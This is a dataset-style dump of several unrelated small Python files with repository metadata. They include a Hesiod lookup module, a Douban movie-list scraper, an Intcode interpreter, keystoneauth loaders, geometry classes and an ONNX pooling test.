        'NFS': ('remote_location', 'server', 'mode', 'mountpoint'),
        'ERR': ('message',),
        'UFS': ('device', 'mode', 'mountpoint'),
        'LOC': ('location', 'mode', 'mountpoint'),
    }
    def __init__(self, name):
        Lookup.__init__(self, name, 'filsys')
    def parseRecords(self):
        Lookup.parseRecords(self)
        self.filsys = []
        # When several records exist, each one carries a trailing priority.
        self.multiRecords = (len(self.results) > 1)
        for record in self.results:
            priority = 0
            if self.multiRecords:
                record, priority = record.rsplit(" ", 1)
                priority = int(priority)
            fields = record.split(" ")
            fs_type = fields[0]
            if fs_type not in self._FIELDS:
                raise HesiodParseError('Unknown filsys type: %s' % fs_type)
            entry = dict(type=fs_type)
            for offset, field_name in enumerate(self._FIELDS[fs_type]):
                entry[field_name] = fields[offset + 1]
            entry['priority'] = priority
            self.filsys.append(entry)
        self.filsys.sort(key=(lambda entry: entry['priority']))
class PasswdLookup(Lookup):
    """A Hesiod 'passwd' lookup: exposes the record as ``self.passwd``."""
    def __init__(self, name):
        Lookup.__init__(self, name, 'passwd')
    def parseRecords(self):
        # passwd(5)-style colon-separated record; uid and gid become ints.
        fields = self.results[0].split(':')
        fields[2], fields[3] = int(fields[2]), int(fields[3])
        self.passwd = struct_passwd(fields)
class UidLookup(PasswdLookup):
    """Like PasswdLookup, but keyed by numeric uid ('uid' Hesiod type)."""
    def __init__(self, uid):
        # Intentionally calls Lookup.__init__ directly so the Hesiod type is
        # 'uid' rather than PasswdLookup's 'passwd'; parsing is inherited.
        Lookup.__init__(self, uid, 'uid')
class GroupLookup(Lookup):
    """A Hesiod 'group' lookup: exposes the record as ``self.group``."""
    def __init__(self, group):
        Lookup.__init__(self, group, 'group')
    def parseRecords(self):
        # group(5)-style record: name:passwd:gid:member,member,...
        fields = self.results[0].split(':')
        fields[2] = int(fields[2])
        # An empty member field means "no members", not [''].
        fields[3] = fields[3].split(',') if fields[3] != '' else []
        self.group = struct_group(fields)
class GidLookup(GroupLookup):
    """Like GroupLookup, but keyed by numeric gid ('gid' Hesiod type)."""
    def __init__(self, gid):
        # Intentionally calls Lookup.__init__ directly so the Hesiod type is
        # 'gid' rather than GroupLookup's 'group'; parsing is inherited.
        Lookup.__init__(self, gid, 'gid')
# Public names exported by `from hesiod import *`.
__all__ = ['bind', 'resolve',
           'Lookup', 'FilsysLookup', 'PasswdLookup', 'UidLookup',
           'GroupLookup', 'GidLookup',
           'HesiodParseError']
| 33.93913 | 72 | 0.478606 | 353 | 3,903 | 5.093484 | 0.252125 | 0.048943 | 0.036707 | 0.055617 | 0.262514 | 0.219132 | 0.172414 | 0.172414 | 0.172414 | 0.129032 | 0 | 0.012324 | 0.417884 | 3,903 | 114 | 73 | 34.236842 | 0.779049 | 0.041507 | 0 | 0.318182 | 0 | 0 | 0.043034 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.113636 | false | 0.125 | 0.034091 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5cb8bdd032359f6049176403be6a28a63908a5f4 | 3,488 | py | Python | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | Doulist-book-Spider/spider.py | bujige/Python-practice | c1eb76b0caaada628f23a477303f07d6be3f707c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#-*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
from bs4 import BeautifulSoup
import re
import urllib2
import xlwt
# Fetch the full HTML content of a page (Python 2: urllib2, print statements).
def askURL(url):
    request = urllib2.Request(url)  # build the request
    try:
        response = urllib2.urlopen(request)  # send it and read the response
        html= response.read()  # page body as a string
        #print html
    except urllib2.URLError, e:
        # Print whatever diagnostic the error object carries.
        if hasattr(e,"code"):
            print e.code
        if hasattr(e,"reason"):
            print e.reason
    # NOTE(review): if urlopen fails, `html` is unbound here and this line
    # raises NameError -- confirm the intended error handling.
    return html
# Scrape the Douban Top-250 list pages and extract one record per movie.
def getData(baseurl):
    findLink=re.compile(r'<a href="(.*?)">')  # movie detail-page link
    findImgSrc=re.compile(r'<img.*src="(.*jpg)"',re.S)  # poster image URL
    findTitle=re.compile(r'<span class="title">(.*)</span>')  # movie title
    # rating score
    findRating=re.compile(r'<span class="rating_num" property="v:average">(.*)</span>')
    # number of people who rated the movie
    findJudge=re.compile(r'<span>(\d*)人评价</span>')
    # one-line summary
    findInq=re.compile(r'<span class="inq">(.*)</span>')
    # details block: director, cast, year, region, genre
    findBd=re.compile(r'<p class="">(.*?)</p>',re.S)
    # markup fragments to strip from the details block
    remove=re.compile(r' |\n|</br>|\.*')
    datalist=[]
    # 10 pages of 25 movies each; the start= offset pages through the list.
    for i in range(0,10):
        url=baseurl+str(i*25)
        html=askURL(url)
        soup = BeautifulSoup(html)
        for item in soup.find_all('div',class_='item'):  # one div per movie
            data=[]
            item=str(item)  # work on the raw HTML string
            #print item
            link=re.findall(findLink,item)[0]
            data.append(link)  # detail link
            imgSrc=re.findall(findImgSrc,item)[0]
            data.append(imgSrc)  # image link
            titles=re.findall(findTitle,item)
            # A movie may have only a Chinese title and no foreign title.
            if(len(titles)==2):
                ctitle=titles[0]
                data.append(ctitle)  # Chinese title
                otitle=titles[1].replace(" / ","")  # drop the separator
                data.append(otitle)  # foreign title
            else:
                data.append(titles[0])  # Chinese title
                data.append(' ')  # placeholder for the missing foreign title
            rating=re.findall(findRating,item)[0]
            data.append(rating)  # rating score
            judgeNum=re.findall(findJudge,item)[0]
            data.append(judgeNum)  # number of ratings
            inq=re.findall(findInq,item)
            # The summary may be missing.
            if len(inq)!=0:
                inq=inq[0].replace("。","")  # drop the trailing full stop
                data.append(inq)  # summary
            else:
                data.append(' ')  # placeholder
            bd=re.findall(findBd,item)[0]
            bd=re.sub(remove,"",bd)
            bd=re.sub('<br>'," ",bd)  # replace <br> tags
            bd=re.sub('/'," ",bd)  # replace '/' separators
            #data.append(bd)
            words=bd.split(" ")
            for s in words:
                if len(s)!=0 and s!=' ':  # skip blank fragments
                    data.append(s)
            # The cast may be missing when the director field is too long.
            if(len(data)!=12):
                data.insert(8,' ')  # placeholder to keep 12 columns
            datalist.append(data)
    return datalist
# Write the scraped records into an Excel workbook (one row per movie).
def saveData(datalist,savepath):
    book=xlwt.Workbook(encoding='utf-8',style_compression=0)
    sheet=book.add_sheet('豆瓣电影Top250',cell_overwrite_ok=True)
    # Column headers (Chinese; must match the 12 fields built by getData).
    col=('电影详情链接','图片链接','影片中文名','影片外国名',
        '评分','评价数','概况','导演','主演','年份','地区','类别')
    for i in range(0,12):
        sheet.write(0,i,col[i])  # header row
    for i in range(0,250):
        data=datalist[i]
        for j in range(0,12):
            sheet.write(i+1,j,data[j])  # data rows, offset by the header
    book.save(savepath)  # write the workbook to disk
def main():
    # Entry point: scrape the Douban Top 250 and save it as an Excel file.
    baseurl='https://movie.douban.com/top250?start='
    datalist=getData(baseurl)
    savapath=u'豆瓣电影Top250.xlsx'
    saveData(datalist,savapath)
main() | 32 | 87 | 0.537844 | 434 | 3,488 | 4.306452 | 0.412442 | 0.064205 | 0.042804 | 0.029963 | 0.077582 | 0.021402 | 0 | 0 | 0 | 0 | 0 | 0.020235 | 0.291571 | 3,488 | 109 | 88 | 32 | 0.736139 | 0.088303 | 0 | 0.045455 | 0 | 0 | 0.12014 | 0.032186 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.056818 | null | null | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cc027723f5b3b780d5950c42ab9f7f49e9095b9 | 899 | py | Python | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | objets/rectangles.py | houahidi/exos-python | 60055ff2933a07876213aa8e5f03c9388f628b99 | [
"Apache-2.0"
] | null | null | null | """ Gestion des rectangles"""
from objets import points as p
from objets.formes import Forme
class Rectangle(Forme):
    """A 2D rectangle defined by its origin point, length and width."""
    def __init__(self, origine, longueur=0, largeur=0):
        Forme.__init__(self, origine)
        self.longueur = longueur
        self.largeur = largeur
    def __str__(self):
        """Return a printable description of the rectangle."""
        # BUG FIX: the label previously said "rayon" (radius), evidently
        # copied from a circle class; a rectangle has a "longueur" (length).
        return "Rectangle(longueur : {0}, largeur:{1}) \n \t".format(self.longueur, self.largeur) \
            + Forme.__str__(self)
    def perimetre(self):
        """Return the perimeter: 2 * (length + width)."""
        return 2 * (self.longueur + self.largeur)
    def surface(self):
        """Return the area: length * width."""
        return self.longueur * self.largeur
if __name__ == "__main__":
    # Quick manual demonstration (Python 2 print statements).
    ORIGINE = p.Point(2, 5)
    RECT1 = Rectangle(ORIGINE, 3, 5)
    print RECT1
    print "Surface : ", RECT1.surface()
    print "Perimetre : ", RECT1.perimetre()
| 29 | 96 | 0.621802 | 106 | 899 | 5.04717 | 0.415094 | 0.08972 | 0.142056 | 0.128972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.252503 | 899 | 30 | 97 | 29.966667 | 0.775298 | 0 | 0 | 0 | 0 | 0 | 0.135863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cc481688e70e209f8ed80b1bc42132901de5460 | 1,893 | py | Python | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 1 | 2017-04-26T04:45:45.000Z | 2017-04-26T04:45:45.000Z | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 6 | 2016-01-12T18:35:12.000Z | 2017-05-31T13:51:41.000Z | rackspaceauth/loading/v2.py | serzh/rackspace-keystoneauth-plugin | 5c51d7f1a9b15dfd6a683e948853401896e78bb7 | [
"Apache-2.0"
] | 4 | 2016-01-11T23:53:57.000Z | 2020-10-28T13:23:56.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneauth1 import loading
from rackspaceauth import v2
class APIKey(loading.BaseV2Loader):
    """Loader for Rackspace v2 API-key authentication."""
    @property
    def plugin_class(self):
        return v2.APIKey
    def get_options(self):
        # Base v2 options plus the username/API-key pair this plugin needs.
        options = super(APIKey, self).get_options()
        options.append(loading.Opt('username', help='Username'))
        options.append(loading.Opt('api-key', dest='api_key', help='API Key'))
        return options
class Password(loading.BaseV2Loader):
    """Loader for Rackspace v2 username/password authentication."""
    @property
    def plugin_class(self):
        return v2.Password
    def get_options(self):
        # Base v2 options plus the credential pair this plugin needs.
        options = super(Password, self).get_options()
        options.append(loading.Opt('username', help='Username'))
        options.append(loading.Opt('password', help='Password'))
        return options
class Token(loading.BaseV2Loader):
    """Loader for Rackspace v2 token authentication."""
    @property
    def plugin_class(self):
        return v2.Token
    def get_options(self):
        # Base v2 options plus the tenant/token pair this plugin needs.
        options = super(Token, self).get_options()
        options.append(loading.Opt('tenant-id', dest='tenant_id', help='Tenant ID'))
        options.append(loading.Opt('token', help='Token'))
        return options
| 27.042857 | 75 | 0.587427 | 212 | 1,893 | 5.193396 | 0.410377 | 0.054496 | 0.073569 | 0.081744 | 0.378747 | 0.378747 | 0.299728 | 0.266122 | 0.266122 | 0.121708 | 0 | 0.00931 | 0.31907 | 1,893 | 69 | 76 | 27.434783 | 0.844841 | 0.275753 | 0 | 0.511628 | 0 | 0 | 0.077999 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0.116279 | 0.046512 | 0.069767 | 0.395349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5ccc43f2af35e3202201e7a59cefaf44ae5c6723 | 5,080 | py | Python | 2019/day9.py | ellull/codeofadvent2017 | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | null | null | null | 2019/day9.py | ellull/codeofadvent2017 | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | 4 | 2021-03-18T20:13:06.000Z | 2022-03-11T23:12:20.000Z | 2019/day9.py | ellull/adventofcode | 6e6530dd179dab1bef35e1ba94c1f86f990af4ae | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import fileinput
from collections import defaultdict
from threading import Thread
from queue import Queue
class Memory(defaultdict):
    """Sparse Intcode memory: unset cells read as 0, negative addresses error."""
    def __init__(self, content):
        # Seed addresses 0..len(content)-1 with the program; every other
        # non-negative address defaults to 0 on first access.
        super(Memory, self).__init__(int, enumerate(content))
    def _validate(self, address):
        # Intcode memory only exists at non-negative addresses.
        if address < 0:
            raise KeyError("address must be greather than or equal to 0")
    def __getitem__(self, address):
        self._validate(address)
        return super(Memory, self).__getitem__(address)
    def __setitem__(self, address, value):
        self._validate(address)
        return super(Memory, self).__setitem__(address, value)
class Intcode(Thread):
    """A complete Intcode machine (relative mode, unbounded memory), runnable
    either synchronously via run() or as a Thread with queue-based I/O."""
    def __init__(self, program, input_queue = None, output_queue = None):
        super(Intcode, self).__init__()
        self.ic = 0
        self.relative_base = 0
        self.memory = Memory(program)
        # Fall back to private queues when the caller does not wire its own.
        self.input_queue = Queue() if input_queue is None else input_queue
        self.output_queue = Queue() if output_queue is None else output_queue
    def _fetch_instruction(self):
        # The two low digits are the opcode; the rest encode parameter modes.
        raw = self.memory[self.ic]
        return (raw % 100, raw // 100)
    def _fetch_params_addresses(self, num_params, params_mode):
        # Decode up to three mode digits; popping from the end yields the
        # least-significant digit first (i.e. the first parameter's mode).
        digits = [int(d) for d in "{:03d}".format(params_mode)]
        addresses = []
        for offset in range(num_params):
            mode = digits.pop()
            address = self.ic + offset + 1
            if mode == 0:
                # Position mode: the parameter holds the address.
                address = self.memory[address]
            if mode == 2:
                # Relative mode: the parameter is an offset from the base.
                address = self.memory[address] + self.relative_base
            addresses.append(address)
        return self.ic + num_params + 1, tuple(addresses)
    def run(self):
        """Execute until opcode 99; returns self so calls can be chained."""
        while True:
            opcode, modes = self._fetch_instruction()
            if opcode == 1:        # add
                next_ic, (a, b, dst) = self._fetch_params_addresses(3, modes)
                self.memory[dst] = self.memory[a] + self.memory[b]
            elif opcode == 2:      # multiply
                next_ic, (a, b, dst) = self._fetch_params_addresses(3, modes)
                self.memory[dst] = self.memory[a] * self.memory[b]
            elif opcode == 3:      # read one value from the input queue
                next_ic, (dst,) = self._fetch_params_addresses(1, modes)
                self.memory[dst] = self.input_queue.get()
            elif opcode == 4:      # write one value to the output queue
                next_ic, (src,) = self._fetch_params_addresses(1, modes)
                self.output_queue.put(self.memory[src])
            elif opcode == 5:      # jump-if-true
                next_ic, (cond, target) = self._fetch_params_addresses(2, modes)
                if self.memory[cond]:
                    next_ic = self.memory[target]
            elif opcode == 6:      # jump-if-false
                next_ic, (cond, target) = self._fetch_params_addresses(2, modes)
                if not self.memory[cond]:
                    next_ic = self.memory[target]
            elif opcode == 7:      # less-than
                next_ic, (a, b, dst) = self._fetch_params_addresses(3, modes)
                self.memory[dst] = 1 if self.memory[a] < self.memory[b] else 0
            elif opcode == 8:      # equals
                next_ic, (a, b, dst) = self._fetch_params_addresses(3, modes)
                self.memory[dst] = 1 if self.memory[a] == self.memory[b] else 0
            elif opcode == 9:      # adjust the relative base
                next_ic, (src,) = self._fetch_params_addresses(1, modes)
                self.relative_base += self.memory[src]
            elif opcode == 99:     # halt
                break
            self.ic = next_ic
        return self
computer = Intcode([109, 1, 204, -1, 1001, 100, 1, 100, 1008, 100, 16, 101, 1006, 101, 0, 99]).run()
assert list(computer.output_queue.queue) == [109, 1, 204, -1, 1001, 100, 1, 100, 1008, 100, 16, 101, 1006, 101, 0, 99]
computer = Intcode([1102, 34915192, 34915192, 7, 4, 7, 99, 0]).run()
assert len(str(computer.output_queue.get())) == 16
computer = Intcode([104, 1125899906842624, 99]).run()
assert computer.output_queue.get() == 1125899906842624
class SingleQueue(object):
def __init__(self, value):
self._value = value
self._used = False
def get(self):
if self._used:
raise Exception
self._used = True
return self._value
if __name__ == "__main__":
program = [int(value) for value in fileinput.input().readline().split(",")]
print("BOOST keycode = {:d}".format(Intcode(program, SingleQueue(1)).run().output_queue.get()))
print("Coordinates = {:d}".format(Intcode(program, SingleQueue(2)).run().output_queue.get()))
| 44.955752 | 132 | 0.625 | 626 | 5,080 | 4.808307 | 0.183706 | 0.204319 | 0.100997 | 0.157807 | 0.524917 | 0.503654 | 0.457143 | 0.4299 | 0.4299 | 0.4299 | 0 | 0.056614 | 0.266339 | 5,080 | 112 | 133 | 45.357143 | 0.751006 | 0.004134 | 0 | 0.16129 | 0 | 0 | 0.027481 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 1 | 0.096774 | false | 0 | 0.043011 | 0 | 0.236559 | 0.021505 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5ccc7127c44d4142b170576b830eded68fe36b7d | 1,495 | py | Python | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | 1 | 2021-04-09T15:55:35.000Z | 2021-04-09T15:55:35.000Z | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | test/runtime/frontend_test/onnx_test/defs_test/nn_test/average_pool_test.py | steerapi/webdnn | 1df51cc094e5a528cfd3452c264905708eadb491 | [
"MIT"
] | null | null | null | import chainer
import numpy as np
from test.runtime.frontend_test.onnx_test.util import make_node, make_tensor_value_info, make_model
from test.util import wrap_template, generate_kernel_test_case
from webdnn.frontend.onnx import ONNXConverter
@wrap_template
def template(N=2, H=5, W=5, C=7, KH=3, KW=3, SH=1, SW=1, PH=1, PW=1, DH=1, DW=1, description: str = ""):
if DH != 1 or DW != 1:
raise NotImplementedError
x_shape = [N, C, H, W]
vx = np.random.rand(*x_shape)
vy = chainer.functions.average_pooling_2d(vx, ksize=[KH, KW], stride=[SH, SW], pad=[PH, PW]).data
x = make_tensor_value_info("x", x_shape)
y = make_tensor_value_info("y", vy.shape)
kwargs = {
"kernel_shape": [KH, KW],
"strides": [SH, SW],
"dilations": [DH, DW],
"pads": [PH, PH, PW, PW]
}
operator = make_node("AveragePool", ["x"], ["y"], **kwargs)
model = make_model([operator], [x], [y])
graph = ONNXConverter().convert(model)
generate_kernel_test_case(
description=f"[ONNX] AveragePool {description}",
graph=graph,
inputs={graph.inputs[0]: vx},
expected={graph.outputs[0]: vy},
)
def test():
template()
def test_projection():
template(KH=1, KW=1, SH=1, SW=1, PH=0, PW=0)
def test_global_pool():
template(KH=5, KW=5, SH=1, SW=1, PH=0, PW=0)
def test_odd_k():
template(KH=3, KW=5)
def test_odd_s():
template(SH=1, SW=2)
def test_odd_p():
template(PH=0, PW=0)
| 23.730159 | 104 | 0.621405 | 239 | 1,495 | 3.728033 | 0.34728 | 0.047138 | 0.022447 | 0.063973 | 0.051627 | 0.042649 | 0.042649 | 0.042649 | 0.042649 | 0.042649 | 0 | 0.029711 | 0.21204 | 1,495 | 62 | 105 | 24.112903 | 0.726655 | 0 | 0 | 0 | 1 | 0 | 0.052843 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170732 | false | 0 | 0.121951 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd33629275ce906ddd9c7290b07ab76b7a71763 | 262 | py | Python | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
] | null | null | null | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
] | null | null | null | Ex0014/ex0014.py | Rodrigo-Antonio-Silva/ExerciciosPythonCursoemVideo | 3b2d68094dd5d60f0e45a75590eb2be9be030640 | [
"MIT"
] | null | null | null | #utf-8
#Exercício 14 do curso em vídeo de Python
celsius = float((input('Informe a temperatura em °C: ')))
#transformando de celsius para fahrenheit
fahr = (celsius * 9/5) + 32
print('A temperatura de {}°C corresponde a {}°F!'.format(celsius, fahr))
| 26.2 | 73 | 0.675573 | 42 | 262 | 4.285714 | 0.690476 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032864 | 0.187023 | 262 | 9 | 74 | 29.111111 | 0.798122 | 0.324427 | 0 | 0 | 0 | 0 | 0.424242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd33fb997d932e9651b3a4a601eb452df40b550 | 370 | py | Python | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | 1 | 2020-09-22T13:25:34.000Z | 2020-09-22T13:25:34.000Z | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | null | null | null | NestedLoops/SpecialNumbers.py | Mirkonito/Softuni-Python-Basic | 762b80ea1e0d087613925cde9a03312c83b78168 | [
"MIT"
] | 1 | 2020-10-17T09:27:46.000Z | 2020-10-17T09:27:46.000Z | number = int(input())
for numbers in range(1111, 9999):
is_Magic = True
number_as_string = str(numbers)
for digit in number_as_string:
if int(digit) == 0:
is_Magic = False
break
elif number % int(digit) != 0:
is_Magic = False
break
if is_Magic:
print(f"{number_as_string}", end=" ") | 28.461538 | 45 | 0.551351 | 49 | 370 | 3.959184 | 0.489796 | 0.14433 | 0.216495 | 0.113402 | 0.268041 | 0.268041 | 0.268041 | 0 | 0 | 0 | 0 | 0.041322 | 0.345946 | 370 | 13 | 45 | 28.461538 | 0.760331 | 0 | 0 | 0.307692 | 0 | 0 | 0.051213 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd49ebaea1513f51afa5fbff160017ddd106d58 | 1,028 | py | Python | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | 1 | 2015-01-17T13:16:25.000Z | 2015-01-17T13:16:25.000Z | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | null | null | null | pyscrap3/template/+package.name+/+package.name+/items.py | Zincr0/pyscrap3 | 2eaf03f3598953eddfd6df9de3ea85ee0b75d441 | [
"Apache-2.0"
] | null | null | null | #you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from pyscrap3 import Item
from pyscrap3 import ItemList
class DemoItem(Item):
"""Los Item son ideales para guardar contenido único como el
título de una página o el cuerpo de una noticia."""
def __init__(self):
super().__init__()
self.newfield("title")
self.newfield("body")
class DemoListItems(ItemList):
"""Las ItemList son ideales para guardar multiples contenidos
agrupados, como todos los comentarios de un solo autor."""
def __init__(self):
super().__init__()
self.newfield("author")
| 34.266667 | 73 | 0.727626 | 146 | 1,028 | 5.013699 | 0.671233 | 0.068306 | 0.040984 | 0.057377 | 0.087432 | 0.087432 | 0.087432 | 0 | 0 | 0 | 0 | 0.004837 | 0.195525 | 1,028 | 29 | 74 | 35.448276 | 0.88029 | 0.653697 | 0 | 0.363636 | 0 | 0 | 0.045732 | 0 | 0 | 0 | 0 | 0.034483 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd578165db56b96203e8e97a41fc891e99c158b | 850 | py | Python | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | null | null | null | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | 5 | 2017-11-02T17:12:31.000Z | 2021-04-21T19:07:39.000Z | lib/horizontal_lines.py | rafelafrance/boyd-bird-journal | 289744703220015cb61d22a8e6f8eff0040b296f | [
"MIT"
] | null | null | null | """Contains logic that is unique to the horizontal grid lines."""
from lib.grid_lines import GridLines
class Horizontal(GridLines):
"""Contains logic that is unique to the horizontal grid lines."""
def __init__(self, image):
"""Build horizontal grid lines."""
super().__init__(image)
self.size = image.shape[1]
self.thetas = self.near_horiz
self.threshold = self.size * 0.4
def insert_line(self, from_this_line, distance=-50):
"""Insert a horizontal grid line relative to another line."""
point1 = [0, from_this_line[0][1] + distance]
point2 = [self.size, from_this_line[1][1] + distance]
self.add_line(point1, point2)
@staticmethod
def sort_key(key):
"""Horizontal lines are sorted by their distance on the y-axis."""
return key[0][1]
| 32.692308 | 74 | 0.645882 | 116 | 850 | 4.568966 | 0.448276 | 0.10566 | 0.107547 | 0.071698 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0.184906 | 0 | 0.024653 | 0.236471 | 850 | 25 | 75 | 34 | 0.791988 | 0.311765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cd582135ab7d44f2ce3fd5f31c437f5392bb7ee | 1,419 | py | Python | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
] | 2 | 2020-08-13T09:16:25.000Z | 2020-08-13T16:41:46.000Z | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
